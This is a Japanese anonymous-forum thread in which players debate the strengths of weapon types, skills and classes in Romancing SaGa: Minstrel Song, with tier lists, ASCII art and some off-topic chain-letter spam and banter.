何周かして武器LV5にできるようになると無足、加撃ある技じゃないと不満になってくる。
元が強くて無足、加撃が出る技のある片手斧、打槍、衝槍、弓、杖、刀
って武芸家の武器多いな。
刀技はステータスより武器攻撃力の影響度が高い技多いから、とにかく武器の攻撃力高くなるようにして
壊れるの覚悟で使わないとイマイチだよ。

380 :
中列クジャ闘なら衝槍・弓どちらも活かせると思う。
クラス特性で双龍波もパワーアップするし。

381 :
衝槍の美点は、痒い所に手が届くかのような技の揃い具合だろ
最速始動に 光の腕
状態異常に スゥイング
LP削りに 独妙点穴
ミニオン他に 脳削り
イフリートに 双龍波
アムルアムトに 変則多段突き
雑魚には取り合えず 乱れ突き
ロマンシングに 流星衝
あと術具対応
サブウェポンとして使うには最上位に来る、と言っても過言では無い

382 :
>>380
おれもそれお勧め
今やってる周回で実用化してみたら、これがなかなか使いやすい

383 :
でも双龍波ならクジャ弓で連射とかプラズマじゃね?

384 :
それまでのつなぎとしては双龍は抜群かね、クジャ闘
早めに翼の槍貰っとけば尚更

385 :
虫が強くなってきたら
双龍だよ

386 :
>>381
敵のLP削ることに意味あるのか?
つっこむ訳じゃなく、まじで知りたい。教えて。
泌踏みの太刀、結構好きなんだよ。

387 :
アンサガが混ざってんじゃね?まあ、即死させることも出来るが。

388 :
味方が混乱して相手にリヴァイヴァかけちゃったときに使えるよ!>LP削り

389 :
細剣
○盾防御可能
○火・土の術具あり
○対応クラスに恵まれている(海賊、剣士等)
○技の品揃えが申し分無い
○コストが低く威力の高い技がある(共震剣、金トロ等)
×最強武器であるロペラの入手時期が期間限定
片手斧
○盾防御可能
○対応クラスに恵まれている(海賊等)
○技の品揃えが申し分無い
○コストが低く威力が高い技がある(フライ・バイ等)
×術具が無い
長剣
○盾防御可能
○全体ディフレクト可
○対応クラスに恵まれている(剣士、ロザ重等)
○コストが低く威力の高い技がある(共震剣等)
×術具が無い
×全体攻撃出来る技が無い
両手大剣
○火・風の術具あり
○対応クラスに恵まれている(剣士等)
○技の品揃えが申し分ない
○専用技であるヴァンダライズの使い勝手や威力が鬼
×盾防御不可

○ロマンシング度が最高
×術具が無い
×対応クラスに恵まれない
×技の威力がやたら低い
×ディフレクト不可
×盾防御不可

390 :
刀・・・・
でも、払車剣と流星刀の存在だけは認めてやっても良いと思うんだ

391 :
AGIダウンで4桁ダメ逝く逆風の太刀も悪くないよ。
秘踏み、みね打ち、骨砕きもエス闘との相性良し。

392 :
>>386
化石魚にかましたらええがな( ´・ω・`)
ええがな・・・( ´・ω・`)

393 :
片手斧使おうとすると大抵海賊なんだけどさ
成長とか使い勝手考えるとどうしても細剣つかっちゃうんだよね。
イフ相手にフライバイ用に持ち変えるだけ。それも体術あげてればサブミで事足りるし正直微妙。

394 :
武器の事でくだ質に問うのも何なので、ここの武器のスペシャリスト達に聞きます。
オーヴァドライブの5連携で各武器最良(オススメ)の連携を語って頂きたい。

395 :
棍棒は技性能は微妙だけどステータス成長に一目置いてる
BP含めて穴無く伸びるのがいいね
長所も無くなっちゃうけど

396 :
>>394
あまりにベタで申し訳ないが、
両手大剣ヴァンダスマッシュヴァンダ・・・

細剣の変幻石火変幻・・・
あたりが比較的使い勝手が良いですよ

397 :
>>395
ロザ術で棍棒使わせてるダーク(アルドラ)の体力が12なんですがw
知力精神等は60弱なのに。
ま、ダークの体力は例外だろうけど、棍棒って穴無く伸びるのか。

398 :
そんなときは両手斧か体術か両手大剣

399 :
かすみ二段×5も加撃出やすいし、コスト的によろしいと思う、
弓は連射×5、杖はウォター石火ウォター石火ムーン、体術は三龍稲妻三龍稲妻羅刹掌が個人的にお気に入り

400 :
曲刀は何だか惜しい感じの武器だね。
ダークの剣、変幻自在がある上にBP成長率も細剣とタメ、
デミルーンで懐古受けも狙えるんだが…
せめて共震剣なみにコストパフォーマンスの良い技があればなあ。

401 :
>>397
ダークの腕力、体力成長値が2だからねw
更に言えば、術の方をメインに使ってない?
棍棒だけ使ってれば、知性精神60付近で体力12は流石に低すぎるよ
終盤差し掛かれば30は越えると思う
成長値が全て6のグレイに棍棒だけ使わせてると、殆ど横並びに成長するとオモ

402 :
>>401
ロザ術なんで術メインなのは確かだが、ツイスターを+3になるまで使わせた。
その前にもメイスやバトルハンマーで適当に殴ってた。
ちなみに腕力は22ある。
ここ3周毎回ダーク入れてるが、ここまで体力の伸びないダークは初めて。
ダーク用の技もほぼ全て覚えたし、棍棒中心で頑張ってみる。
でもダークに棍棒よえぇ・・・天狗走りしかまともにダメージ与えられんw

403 :
>>402
いや、今から腕力や体力だけ上げるなら>>398の言うように両手斧か体術辺りが無難
腕力重視なら両手斧、体力重視なら体術でどうぞ〜
war of sideのリンク張った方が早いかね
ttp://www.geocities.co.jp/Playtown-Knight/8318/sei.html

404 :
>>403
いや、ダークだしとりあえず体力30弱ありゃいいかなw
だから棍棒中心で少しずつ上げようと思う。
ゲラニハの器用さはさすがに我慢できなくて細剣使わせたけど。
いろいろとレスサンクス。

405 :
ジャミルの腕力体力は他ステ60の時期にいつも2ですが何か?

406 :
流石に1か2くらいは上がると思うんだけど

407 :
そのステが上がる可能性のある行動を一回もとった事が無い場合、
そのステは絶対上がらなかったりする。仲間にした後の竜騎士の腕力とかね。
一回でもやってれば例えずっと防御しててもたまに上がるらしい。

408 :
ここには邪悪な哲学で曲刀を宣伝する香具師は居ないのか。

409 :
今日初めて手に入れたオブシダンソードに果てしないロマンシングを感じる。

410 :
曲刀は幻獣剣だけ
ダークの剣?シラネェヨ

411 :
オブシダンソードは防具として見れば超一級品

412 :
そんなことはない。
全てのステ+1、気術耐性だけ。
ふんっ。

413 :
     ,..-⌒`、          ,,..-⌒ヽ
     ( ノ /'´ ̄ ̄ ̄ ̄ ̄``ヽ,、彡ノ
      ヽ / ノノノ  ノ ノノ   ;ヾヽ;ヽ
    _(ー/  ノノ ノ  ノノ  ノ ヽ ヽノヽ
   ( ー / ヽ ,,..- '´ ̄  ̄  ̄     ヽノノ) 
   ( ヾ_ ,lヽ/   ⌒       ⌒   |−))
   (,.. 彡|::::::::::   (○)     (○)  ,|彡 )   ・・・・・・・・・
   ヽ三 'ヽ:::::::::::::: *\___/*  |三) )   
    ``-'´ ヽ:::::::::::::::.  \/    ノ -'´´
        /´ヽ- -  -- - - ヘ\  
       /  /  `''ー○-'´   Y | 

414 :
>>412
それに加えて
斬撃防御+20、打撃防御+20、射突防御+20も追加されるよ!オブシダンソード。
ゲーム画面じゃ確認できないけどね。

415 :
確認出来るぞ
装備画面で△

416 :
オブシダンソードあると装備を術防に補強しやすいのが嬉しい
武器としては・・・・

417 :
>>414
知らなかった。
他の運命ストーンはどうなんだろ。
邪だけ特別って事はないよな。

418 :
いや、オブシダンだけ特別。
形状も唯一武器だし。

419 :
506 :大丈夫!名無しさんの攻略法だよ。:2006/11/13(月) 02:44:59 ID:3R6gcaVI
炎のロッドって武士沢ブレードに似てるね

507 :大丈夫!名無しさんの攻略法だよ。:2006/11/13(月) 02:56:47 ID:slkY7Oae
ああ、あのうすた京介の

細剣の話題が全然出てないので

420 :
もう細剣へのこだわりはなくなったよ。
あえて捨てたのではなく、4周目辺りから他の武器の良さが分かってきた、って感じ。
数ヶ月前は俺もこのスレの常連だったんだが。

421 :
いよいよ

422 :
男ならデミルーン

423 :
曲刀はマルチウェイの弱さに脱毛した

424 :
ならダークの剣を使えばいいじゃない

425 :
5周目にて初めて両手大剣を使ってみた。
いやはや。
ヴァンダとアパスマのコストパフォーマンスの良さは異常じゃない?消費BP7でこの威力は頭が下がるよ。
今までは盾が使えないという理由で避けてたけど、これからはスタメン入りしそうだわ。

426 :
ヴァンアパは剣士対応の上にAモード技だから強いんだろね。
両手体験は城塞以外のクラスでもDモードにすれば結構ディフレクトするしね。

427 :
アリの巣コロリってあるじゃん。
蟻の行列にポンと置くと、一瞬ビックリして列が乱れる。
邪魔だなと言わんばかりに迂回する列が出来る。
そのうち好奇心旺盛な一匹がアリの巣コロリに入る。
そいつをマネして何匹も入る。
毒とも知らずにツブツブを運び出す。一匹が一粒づつ。
いつのまにか行列はアリの巣コロリが折り返し地点になる。
黄色い粒と黒い蟻が作り出す模様は綺麗で見てて楽しい。
一匹が一粒づつ、丁寧にせっせと毒の粒を運ぶ。
せっせと、せっせと、せっせと、せっせと。
蟻さんって働き者だなと思う。俺も頑張らなきゃなと思う。
次の日、あれほど沢山いて俺を困らせた蟻が一匹もいない。
ほんとにいない。探してもいない。泣きたくなった。                   

このレスを見た人は4日後にあなたの大切な人がいなくなるでしょう・・・・
それが嫌ならこのレスを5つの板にコピペしてください。 
信じるか信じないかはあなた次第です。


428 :
さみしい村だな

429 :
両手大剣は前衛と中衛の効果が大して変わらない点も評価できるよね。まぁ元々前衛の効果が弱いからこそなワケだが…。
細剣は前衛の効果が優秀すぎるだけに前衛でしか使えないしな。中衛の細剣なんて何の意味も無いし。そういう意味では不便のような気もする。
サルやデスを相手にする時は極力前衛1人にしたいからなぁ〜。

430 :
さげ

431 :
糞スレage

432 :
細剣の読み方、サイチェン

433 :
アルマーニだと細剣って読むんだな
ずっと細剣って読んでたわ

434 :
俺今まで細剣って読んでた・・・

435 :
俺も細剣って読んでた・・・

436 :
んなことするぐらいなら落とせよ、ったく‥

437 :
俺も細剣を細剣と読んでた時期があった…

438 :
細剣って細剣って読むんじゃなかったのか

439 :
細剣の良さを教えてください。
大剣の拍車やヴァンダや全体リフレクトを捨ててでも選ぶ価値はありますか?

440 :
ログ読めよ。

441 :
紐剣じゃなかったのか!!!!

442 :
いつまでもつまんねーネタひっぱんなよ

443 :
カーバンクル

444 :
水晶の龍

445 :
糞スレ保守

446 :
保守

447 :
確かによーく見ると紐剣て書いてあるよな

448 :
保守

449 :
うわあ、もうこんなに過疎ってる・・・
もうみんなミンサガなんてやってないのかな。

450 :
そうか

451 :
もうみんな細剣なんて使ってないんだよ

452 :
LV0 杖?どうせ典型的弱武器だろ?どうでもいいよ…
LV1 乱調子はけっこう使えるな。ってかなんで杖でスウィング使えるの?
LV2 ウォータームーンは綺麗だな。電光石火は術士タイプでも使えてて結構いいかも。
LV3 電光石火って最強じゃね?理想の杖技って感じ・・・
LV4 ドラ鳴らしもバキの打震みたいでかっこいいな。骨砕きとか返し付きとか痛打とかかぶと割りもいい・・・
LV5 からすとうさぎって別に強くないのにのにBP消費高くててうぜぇ。からすとうさぎR!
LV6 からすとうさぎロマンシング!!!!
LV7 やべぇ烏兎最高!烏兎と水さえあれば生きていける!
LV8 からすとうさぎを極めた!俺はからすとうさぎを極めたぞ!!
LV9 やっぱ電光石火は最高だわ
MAX ねんがんの ダークスタッフ をてにいれたぞ

453 :
>>452
からすとうさぎ( ´・ω・)カワイソス

454 :
みなさん、あけましておめでとう。
これがこのスレ最後の書き込みとなった・・・

455 :
ほう

456 :
細剣なんてクソ武器使ってるから過疎るんだ

457 :
片手斧がまた喧嘩ふっかけりゃ面白くなるんだが

458 :
いや、両手斧だろ

459 :
細剣>片手斧>両手大剣>長剣>打槍>両手斧>体術>弓>その他

460 :
ぶっちゃけコスパとディフレクトが全て
このゲーム、強いボスにはゴリ押し出来ないようになってるし

461 :
そもそも細剣は強い武器ではなく便利な武器だと思うんだ。

462 :
細剣や片手斧って(要は海賊)真サル戦でも前衛に出すの?
長剣や弓、大剣は中列でも一定の補正がかかるからいいけど、上記2種は
前列以外じゃ効果ガタ落ちだからなあ…。

463 :
細剣の話しないと泣いちゃうぞ。こんな細い剣折っちゃうぞ。

464 :
坊はひっこんでろ

465 :
叱られても平気だぞ。ロペラを二本持ってるんだぞ、う、う・・・

466 :
お前ら細剣細剣うるさいけどな、細剣なんて弱ぇっての
ロペラ何本持ってようが体術には負ける
WP回復の必要も武器買い換える必要も無いから金を防具に回せる
知力腕力低下や状態異常技でリスク減らせる
カウンター&錬気で防御面もピカ一
細剣が勝ってるのは全体攻撃くらいか?w
それだって火の鳥だろ?
魔術撃ってないで円舞剣で回ってろよwwww

467 :
火術じゃないのか

468 :
魔術じゃ系統になっちまうな、術法って脳内修正してくれ

469 :
お前ら細剣細剣うるさいけどな、細剣なんて弱ぇっての
ロッド何本持ってようがロザ術対応の杖には負ける
雑魚にはBP消費も含め自由に組み換えられる合成サイコ使えば状況に応じて戦える
オウルメイジブリムで知力精神も上がりマヒ付与すればリスク減らせる
メイジ幻体で防御面もピカ一
細剣が勝ってるのは変幻自在くらいか?w
それだってBP高過ぎだし、電光かぶとにヲーターあれば問題ないだろ?
まあ火の鳥ナッツにでも撃ってブギャーされてろよwwww

470 :
ごめん。ウソついた
ホントは俺、翼の槍吹雪派なんだ・・・

471 :
お前らなにか勘違いしているようだが、火の鳥ってのは君主の大斧から撃つもんだぞ。

472 :
一番いいのはさ
素でミリアムに撃たせることなんじゃないの?
似合うぞ

473 :
>>472
良く言った

474 :
とりあえず炎のロッド5人分揃えて、火・水の術両立ってやってるやつは多いと思うんだ

475 :
親分+羅刹の剛剣+切り返しでいい加減にしろよ
かわいすぎ

476 :
>>474
漏れもそれやってたけど火の鳥×5は案外意味がないことに気付いたw
けどまぁセルバ×5はイフ道場では役に立つし
リヴァイバ×5も強敵戦では役に立つ
同様にオヴァドラ×5ってのも案外無意味だし
とにかく、いくら強いからって×5するのはナンセンスだと悟った昼下がり

477 :
富岳八景×5は圧巻ぞ。アパスマのほうがいいとか言うな。心の問題だから。

478 :
合計四十景か
本物超えてどうする

479 :
北斎の富岳三十六景は実は46枚

480 :
ほそけん

481 :
         /           ヽ、
        /             ゙,
        / ,  l  ;;!   ヽ       !
      / ! ,1 /`1 ト,  ! l  、   |
     ∠ _i l l^|、|  | ,;' |  ! ! |  `丶!
      〜| /| l|lヽ|  l/_匚レ ,'、......,,,,__\
       || ヽハゞツ  "T:;iiiiフ ,' ー〜'| ~`~
          ヾ!\rー-、` ´,!//ノ ノリl|
           f ~>‐'七7 /メへリ l!
           |  | ヽ ''"   ) \
           ! i \ __ ー/  / i
           / ;     ̄   / ::::'、
 ,. -‐''^ヽ、 ,.ャ  | :l        ,'  、::::',
       `"/  `、!:::::l::i:: : ::::::::::::l    :::',
    一  \   !|::::::l: : : : ::::::::l|   :: :: ::)
 使   生  ヽ ! |      :::::::|  : : :::::`,
  っ    ド   ヽリ      ::::::::`r-t=,,-r'"
   て    レ  ヽ       : :::::::ヽ |  i
    ろ    ス  \    ::::::::::::::::ヽ!  l
          ソードで も\

482 :
素で細剣って読んでるやつってどんくらいいるんだろうか

483 :
>>482
それじゃなんて読んでるのかわかんねーだろw>細剣
平仮名で書きなさい。

484 :
ほ・・・細剣

485 :
管質で定期的にひも犬って核人が現れているのには何か裏がありそうだ。
調査してくれないか

486 :
再建

487 :
コマケン

488 :
イトケン

489 :
債権?

490 :
こまきん

491 :
細剣+2だと武器のEP消費するから、例えば、ロペラ+3強度4の方が使い勝手がいいような。
火の鳥は雑魚を片すのにはいいかもしれないけど、術法だと盾使えないから不便だよね。
長剣は盾使えるし、他人ディフレクトあるし、全体攻撃はなくてもいい奴だと思う。

492 :
さいけんって読むのかと思ってた。

493 :
ホソケンから、火の鳥と海賊と凶神拳と変幻自在とロペラを取ったら
片手斧にすら劣るよね。
つまりサイケンイラネ。

494 :
>>493
電光石火「まだ私がいるゾー!!」

495 :
今周は細剣禁止してみる

496 :
だがロペラの誘惑に負けた

497 :
>>494
じゃあ、電工石化も禁止

498 :
日曜のニュースでニートやフリーターやひきこもりを
奴隷化する制度ができるらしいってよ〜〜。
契約社員みたいにこきつかわれて使い捨てされるってよ〜。
ニュースみろよ〜〜。
おれは、はやく忍者になりたいなあ。

499 :
ぜいいん、剣士大剣ヴァンダアパスマオーヴァドライブにすれば最強だよ

500 :
ヴァンダは使ってて面白くないな
なんとなく

501 :
剣士でオバドラの使い方教えてくれ!

502 :
俺が何故細見がすきかと言う戸棚
1週目はアルベルトだったから、ずっと細見つかってた
そしてだいちのけん。変幻自在を閃いたときにはあまりの格好良さに惚れた。
それ以来毎週細見使いをパーティに独り入れてる。
来週はロッド比の鳥の性能を見せてもらうつもり

503 :
>>501
ロー
ザリア術法士に、魔法をかけてもらえば出来るよ。
剣士のオーヴァドライブヴァンダアパスマの威力は異常。

504 :
そんなことできるわけねえ

505 :
>>503
そりゃ無理。
オバドラ、バンダアパスマなら…
武装弦楽、ウェポンブレス、強化モーグレイでオバドラ詠唱中に人参に凶戦士化されるってのが最強じゃないか?

506 :
一人旅でもなければ
行動順指定で狂戦士の薬.→ODでいいだろ

507 :
凶戦士薬は行動キャンセル、凶戦士は魔法使用不可。
知らないのか?

508 :
行動キャンセルは戦士の秘薬
狂戦士になったそのターンに入力してあった術は使用可
ただし威力は激減

509 :
くだ質からコピペ
体術…盾ディフレクトなし、カウンターあり、全体攻撃がほぼないことを除けば状態異常始め技が豊富、練気の自動再生は有用
小型剣…単体攻撃は強い、水竜剣はスキル非対応でも水の術具として役立つ
長剣…他人ディフレクトあり、武器D技が豊富で防御と攻撃面が優れる、全体攻撃なし、ロザ重剣士城塞対応
大型剣…他人ディフレクトあり、技は豊富、対応クラスにあまり恵まれない
両手大剣…秘踏み払車ヴァンダアパスマが強力、剣士対応
細剣…金トロ電光変幻+ロッド火の鳥で単体全体攻撃ともにこなせる、ロッドセルフリヴァイヴァも使える、海賊剣士対応
刀…盾ディフレクトがない、秘踏み払車剣は強い、逆風のAGIダウン、乱れ雪月花
曲刀…ダークの剣は強いが隊列補正で引けをとる、単体には強いが全体攻撃がいまいち、対応クラス的にも目立たない
衝槍…双龍破、翼の槍吹雪、マリス火の鳥、他人ディフレクトあり、対応クラスの他スキルが使えるので専らサブ武器
打槍…双龍破、ウコムの鉾神雷、他人ディフレクトあり、ウコムの鉾はスキル非対応でも水の術具として役立つ
片手斧…高速ナブラフライバイで単体に強い
両手斧…盾ディフレクトがない、単体はアパスマ全体はグラスラがEP0で撃てる
弓…中列後列が適するため平均的には被弾しにくい、技は豊富、フェニクスでHP回復もできる
棍棒…ソツがないが、押しなべて技の押しが弱い
杖…ロザ術合成サイコのお供、電光石火乱調子など単体は強い

510 :
エスパータ・ロペラを2本手に入れる裏技があるらしいけど、どうやるの?
皇帝から褒美を2回もらえるってやつ。

511 :
くだ質でききなさい

512 :
今回細剣使わんで進めて、改めて細剣の偉大さを知った
わりと簡単に最強武器が手に入るしロッドも使える
海賊にしたらさらにすばやさに補正がかかる、剣士で攻撃力を上げてもいい
で、技のラインナップが絶妙
低コスト技から強い技まで幅広く揃ってる、やっぱ細剣最強だわ

513 :
ロペラの強度、みんなどのくらいにしてる?
自分は対応クラスで電光石火が消費0で使えればいいやと思って
冥界毒爪に強度+1(性能+30%)で使ってる。武器性能は確か62だったはず。

514 :
クラス対応なら強度-2でもいいだろ

515 :
敢えて言おう!
アラ・メルビラーナを選択した、と!

516 :
細剣使いがいなきゃそれでいいかもな。おれは金もらってフィールドアーマーの足しにしたが。

517 :
死の剣は捧げた仲間の数だけ性能強化とかだったらよかったのに

518 :
もうみんなほそけん使ってないのかな?

519 :
強度はエレクトラム付けて6にしてます

520 :
剣の女王って、補正あるよね。
攻撃力は、17しかないけど
ロペラが素振りで600ダメージ
剣の女王が共振剣で1200ダメージ

521 :
剣士と城塞と帝国正騎士を使っているが、主に使っているのは長剣と両手大剣と打槍と両手斧だ。
細剣はロッドでセルバや生命の炎くらいだ
何か文句ある?

522 :
てか細剣の大技(変幻自在)以外ぜんぜん閃かないよね
ヴァンダライズとかマルチウェイとか不動剣とか

523 :
両手大剣は楽勝だと思うし、そう聞くこともしばしば。
ヴァンダアパスマ払車は変幻と同程度か少し毛の生えた程度に感じる。
他にも簡単なのはあるが…、弓とか。

524 :
>>521
両手斧は変幻よりコストパフォーマンス上のアパスマと
強度最大でEP消費ゼロのグラスラで強い
だがクラスが惜しいんだよなあ
これだけが難点
細剣は技のラインナップ、閃きやすさ、武器入手難易度、クラス
色んな意味でバランスの取れた武器

525 :
あげといてやるよ

526 :
異次元レスです
>>525
おう
>678
>上のは見た目とかで使う人がいるでしょ
見た目で使いたいならいいんじゃね? と。
それくらいの自由はあると思うけど・・・なに? そこまで狭量に見えた?
>下のは術禁止で逆風の太刀使って真サル術禁止とかあったよ
ごめん、あんまり意味が分からない。
素早さ下げまくって何がしたいんだ? その戦法だと結局は運じゃね?

527 :
あのレスの仕方だとそう見えるよ
前のレスも喧嘩腰だったし
素早さ下げるのはステダウンさせやすくするのと(第一ではサブミッションのSTRダウンと併用)
術禁止だとリヴァイヴァ、幻体が使用できないのでアニメートに先行する必要があるため

528 :
真猿相手では、流星刀を3本くらい装備する場合あるからね。

529 :
まずこっち
>678
>そりゃ劣化両手大剣な面があんのは明らかだが、
>あくまで、刀がそこまで弱いか?という素朴な疑問なんです。
>劣化版だから一番手に弱いんだってことならもういいけど。
>質問の答え
>クラス特性と対応スキルに差が出る。
>ま、代表的に4技挙げただけなんで…。場合により使い道があるのは光の腕、逆風とか。
真サルとか狩ってればわかると思うが、盾ディフレクトが無いのがまず最大に辛い
そこで劣化しつつ、クラスも微妙。エス古のクラス特性も連携に組み込まなきゃ満足の行く結果が得られない
底辺を争うのは大抵刀か衝槍だけど、そりゃ衝槍よりは上だと思ってるよ

530 :
>>527
アニメート先攻て、術使えないのに何を先攻するんで?
で、こっち
>678
>わざわざ刀使う意味って、そりゃあ、いろいろあるだろうさ。
>好きだからとか、奥義が見たいとか、グレイの鬼神刀イベントのためとか。
>刀使ってもクリアには十分だよ。
>いろんな武器を使うのもゲームの楽しみの一つなんだから。
>初心者に刀は最強武器の一つなんてことは、このスレでは言ったことはないはずだ。
>ちゃんとロマンシング武器だって言う回答がほとんどだと思う。
それは論点のすり替え
>みね打ち骨砕き秘踏み払車
これを目当てで使いたいのに刀でわざわざやる必要がないと言うこと
ちゃんと文章読むように
クリアには充分だし、鬼神刀イベも楽しいし、最強武器だという奴への反論は一切していない
ただ刀はクセがあるが強い、とか言い出した奴のせいで俺は('A`)ってなった

531 :
ディフレクトはないと辛いけど全員刀でやるわけじゃないでしょ
何を勘違いしてるのか知らんけど
エス古のクラス特性は連携に組み込まなくても十分出るよ
つか連携に組み込んでステ異常発生率上げるなら火力が高くなる武芸家の方がいいでしょ

532 :
>>530
傷薬で先行して回復

533 :
エス古で刀で秘踏みより使い勝手のいいライフ攻撃は無い。

534 :
素早さダウンによる真サルへの命中率アップの効果もある。
あと俺は衝槍と並んで刀最弱の理由を聞きたかっただけ。
最弱とは思ってなかったから。
「仮にも回答だから」そこんとこはっきり聞いてみようと思ったのさ。
だから個人的に刀ヨエーって言うのはどうでもいい。
>>529
じゃあ3つ質問
武芸家は?
ディフレクトがないのがきついなら他人ディフレクト増やせばいいのでは?その辺は兼ね合い、塩梅じゃないのか。
刀ディフレクトのなさを最大に挙げるくらいなら両手斧はどう思ってるの?
エス古については単にライフ攻撃が発動しやすくなったら
雑魚始末にいいなって感じだな。ライノギガントとかさ。
曲刀幻体もちょっとはいい。

(書いてないんで注釈)
>>526以降の発端はくだ質LP132>>660前後

535 :
刀そこそこつよいよ
払車があるだけで、雑魚相手には上位レベルの攻撃力になる
両手大剣が上位互換といって差し支えない性能だけど
他の武器と比べて特別弱くはない
両手大剣や大型剣が使えないクラスで刀使えるときとか(エス古とか)払車剣のためだけに育てても十分割に合うよ。

536 :
>>530
>>みね打ち骨砕き秘踏み払車
>これを目当てで使いたいのに刀でわざわざやる必要がないと言うこと
これを目当てで使いたいとか言ってないじゃないか。
刀がそれほど弱いとは思わないという根拠で挙げられてる技だ。
両手大剣より強いとかは言ってないし、十分使える技もあるって例だろ。

537 :
>>532
ああ、なるほど・・・サッパリ使わないから存在忘れてた
それにエス古の特性については勉強不足かも知れんな。結構使ってるんだが正直すまんです
でもその縛りについてだが、ワザワザ刀に縛る必要がどこにあるんだ?
凄いのは術無しって部分で刀については逆に足引っ張ってない?

538 :
>>533
ファイナルレター・影矢で即死じゃいかんの?
>>529
>武芸家は?
は? とか聞かれてもな。無足、加撃がちょびっと増えただけでも大してダメは増えない
>ディフレクトがないのがきついなら他人ディフレクト増やせばいいのでは?その辺は兼ね合い、塩梅じゃないのか。
勿論そうだが、なんでわざわざ足引っ張る必要があるのかわからん。趣味まで否定はせん
>刀ディフレクトのなさを最大に挙げるくらいなら両手斧はどう思ってるの?
そもそも使ってない。けど火力で押し切るならグラスラは最高峰の技。飛んでる敵にはさようなら
つかお前ら刀好きすぎ。待ってろ

539 :
>>537
縛りに必要性なんて…無茶言うなw

540 :
別にディフレクトなんて100%でるわけじゃないんだしそれほど重要視する事なのかね
それよりもセルフ盾が発動しないのが痛い

541 :
>>537
素早さ下げられるのは逆風とかかと切りのみだろ
威力考えればどちらを取るかは明らか
>>538
Zと影矢はコストが高いだろ
月影の無足、加撃はダメージかなり上がる上に必中(三花仙は違うかも)、奥義は最強クラス
パフォーマンスは微妙だが
まあ、ダメージ増やしたいなら無足とか狙うより刀数本装備して剣士にした方がいいだろうな
>>540
真サル戦では非常に重要
俺はセルフ盾は禁止してるなあ、というか片手武器自体使ってなかったりするww

542 :
俺は片手斧が好きだよ!
片手斧マンセーwww

543 :
>>538
即死耐性とライフ耐性は別
基本確率も違うしBP消費も即死は多い。
エス古の得意武器は体術、曲刀、刀だけだ。
ちなみに最も役に立つのは幸運の魔女狩り
基本HP8000ちょっとで即死耐性はあるがライフ耐性無しでLPは2

544 :
>>536
悪い、どっちも斜め読みしてる可能性がある
俺もそんな意図で言ってない
充分使える技がるのはわかる。でも火力に難がある。おわり
>>537て同じIDか
いやwネタ系縛りを参考にする意図が理解できないだけさ、と思ったが↓
>>541
それ普通に斧でもいいんじゃね、と
まっさかさまに素早さ下げる必要も無いし、どうなの?
逆風の太刀縛りなのか?
それと月影の太刀を無足、加撃狙いで乱発するのは辛いだろ
レスするのは今日中だ! 明日まで引っ張りたくないから早く来い!

545 :
さあ今すぐトリップをつけるんだ

546 :
>>538
ほう。ならば両手大剣で連携組んで撃とう・・・じゃだめ?
なんか反論する為に考えたり調べたりしてたらなんだか刀好きになってきたぞ

547 :
ちなみに両手大剣は使うけど好きじゃないのであしからず
大好きなのは片手剣

548 :
>>544
かかと切りじゃ戦闘長引いて不利だろ
回復が練気と傷薬のみなんだから

549 :
やっぱ片手斧でしょ!

550 :
戦闘の三分の一くらいはサブミッションで乗り切る俺。

551 :
城塞打槍Dで乱調子がかなり使えると思うのだが
でもやっぱコスト考えるとヴァンダアパスマかねぇ

552 :
ID:IEFmAHV0ファビョりすぎ
昔の恨み(笑)でくだ質荒らさないで下さい
ゴミカスはRばいいと思うよ

553 :
どっちかと言うと怒ってたのは刀スキーだったと思うがw

554 :
IEFmAHV0がそれに反論出来なくて論点ずらそうとしてファビョりだしたんじゃないの?

555 :
>554
ヒント IEFmAHV0=CAn8XZOB

556 :
いきなりスレが進んでると思ったらなんで唐突に
貧弱な武器の話題してるんだよw

557 :
貧弱は細剣の方では…
優秀ではあるけど

558 :
武器の優劣を議論するスレとしてうってつけだから別にいいじゃん
質問スレでやられたら間伸びしてならん

559 :
イライラして書いた、今は反省している
S:細剣、両手大剣、長剣
A:弓、片手斧、棍棒
B:体術、杖、小型剣
C:両手斧、刀、槍、大剣、曲刀

560 :
>>559
体術・曲刀が低すぎ。
体術はA、曲刀はA〜B、逆に棍棒はBへランクダウンだと思う。

561 :
S:両手大剣、細剣、弓
A:体術、片手斧、刀、曲刀
B:衝槍、打槍、両手斧、棍棒
C:長剣、小型剣、杖
自分の中でBとCなんて差はないし、威力で見たら刀とかぜんぜん違うけど
俺はS、Aに入れた武器をよく使う。
こんなもん使い方とか好みとかで変わるでしょ。
好きな武器使い込んでりゃ、実際は差がついたとしても使用感ではさほど差はつかん。
(一応全部何周も振り回してるから威力やら使い勝手やらはわかってる)

562 :
S:細剣、両手大剣
A:弓、体術、杖
B:片手斧、打槍、長剣
C:曲刀、小型剣、衝槍
D:棍棒、両手斧、刀

563 :
あ、大型剣がないけど別にいいよね\(^o^)/
個人的には術系クラスでも使える杖のそつのなさがポイント高し。
Bまでがスタンダード、Cより下がこだわり系

564 :
杖より、強度上げた細剣小型剣
腕力あれば乱調子で遊んだりできるが、術士だと腕力不足が目立っちゃう
打槍はウコム鉾、小型剣は水竜剣、曲刀は幻獣剣をどれだけ重視するかの立場で変わる
個人的には
・ウコム鉾一本だけで打槍はポイント高い
・曲刀は隊列補正が並なので技だけなら小型剣のが上
・幻体幻フェニ重視なら曲刀優位だがそこまで重視するほどの敵はわずか

565 :
色つき財宝無しの場合で考えてみた。
大剣がDなのは青の剣を取らない限り
ほぼ両手大剣>大剣のため。
両手斧は棍棒で代用できるため。盾装備できないし。
S>>A≧B>>>C>>D
-----------------------
S:細剣、両手大剣
-----------------------
A:弓、体術、片手斧、長剣
B:杖、小型剣、棍棒、曲刀
-----------------------
C:衝槍、打槍
D:両手斧、刀、大剣
-----------------------

566 :
なんで大型剣が最低クラスかが分かんね
AかBでもおかしくなくね

567 :
ウコムの鉾ってそんなポイント高いかな…
城砦騎士Lv4でも色々な技でLP減るから結局管槍+3を使っている。
昨日ウォータームーン覚えて打槍ひまになったので大型剣に持ち
変えてるけど。打槍でウォータームーンは本当きついな。ディアナが
ひたすらはじき打ちを打ってる間に、他の四人のキャラは手慰みに
手付かずの武器をほとんど極めてたな。

568 :
ウコムの鉾は神雷が強いな
あの時期になってパーティの全体攻撃が弱かったら使える

569 :
それぞれに対してコメントを
細剣:言うまでもなく最強。絶妙な技のラインナップ、ロペラとロッドが確実に手に入るところ、
    隊列補正の上昇値、盾発動可能、剣士・海賊対応など枚挙に暇がない。
両手大剣:ヴァンダアパスマは威力絶大。剣士対応で威力はさらに↑。全体に払車があるのも○。
弓:クジャ闘士、クジャ弓必須。序盤から全体あり、連射とフェニックスは使い分けでさらに便利に。
  昔は真サル打倒の要だった。
